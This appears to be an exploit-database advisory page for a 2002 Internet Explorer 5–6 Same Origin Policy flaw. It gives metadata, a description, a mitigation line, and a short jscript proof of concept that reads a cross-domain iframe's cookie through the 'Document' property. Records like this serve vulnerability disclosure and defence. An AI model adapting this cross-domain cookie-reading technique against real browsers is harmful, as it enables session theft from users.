header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized Access
284
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.0
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: Yes
Related CWE: None
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Internet Explorer DOM Access Vulnerability

Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain.

Mitigation:

Ensure that access control checks are performed on all frame properties.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5963/info

Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain. 

<script language="jscript">
onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
        function () {
            alert(document.getElementById("oVictim").Document.cookie);
        },
        100
    );
}
</script>
<iframe src="http://example.com" id="oVictim"></iframe>

Navigation

Suggest Exploit

Services By CQR